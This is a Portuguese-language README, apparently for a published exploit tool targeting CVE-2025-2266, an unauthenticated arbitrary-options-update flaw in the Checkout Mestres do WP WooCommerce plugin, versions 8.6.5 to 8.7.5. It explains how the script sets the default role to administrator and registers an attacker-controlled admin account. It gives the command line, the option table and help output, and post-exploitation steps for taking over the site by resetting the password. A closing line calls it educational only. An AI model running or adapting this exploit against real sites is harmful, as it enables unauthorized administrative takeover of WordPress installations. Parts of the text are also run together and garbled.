
Checkout Mestres do WP para WooCommerce 8.6.5 - 8.7.5 - Atualização Não Autenticada de Opções Arbitrárias
O plugin Checkout Mestres do WP for WooCommerce para WordPress é afetado por uma vulnerabilidade de atualização arbitrária de opções não autenticada nas versões 8.6.5 a 8.7.5.
A função vulnerável cwmpUpdateOptions() carece de verificações de capacidade adequadas, permitindo que atacantes não autenticados atualizem opções arbitrárias do WordPress.
Um atacante pode:
administratorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HEste script em Python explora a vulnerabilidade para:
administrator como função padrãorequests (instalar via pip install requests)8.6.5 – 8.7.5)O script verifica a versão do plugin via:
/wp-content/plugins/checkout-mestres-wp/readme.txt
Se o plugin for vulnerável:
Registra um novo usuário (padrão: nxploited) com privilégios de administrador
python CVE-2025-2266.py -u http://target.com/wordpress -newuser adminx -email [email protected]
| Opção | Descrição |
|---|---|
-u, --url | URL do site WordPress alvo (Obrigatório) |
-newuser | Criar novo usuário admin (nome de usuário padrão: nxploited) |
-email | Email para o novo usuário (padrão: [email protected]) |
usage: CVE-2025-2266.py [-h] -u URL [-newuser [NEWUSER]] [-email [EMAIL]]
CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://example.com/wordpress)
-newuser [NEWUSER] Create new admin user (default username: nxploited)
-email [EMAIL] Email for new user (default: [email protected])
Depois que o usuário for criado:
Visite a página de login:
http://target.com/wordpress/wp-login.php
Clique em "Perdeu sua senha?"
[email protected])Defina uma senha e obtenha acesso total de administrador 🎯
Exploração por Nxploited | Khaled Alenazi
⚠️ Este script é apenas para fins educacionais e de testes autorizados.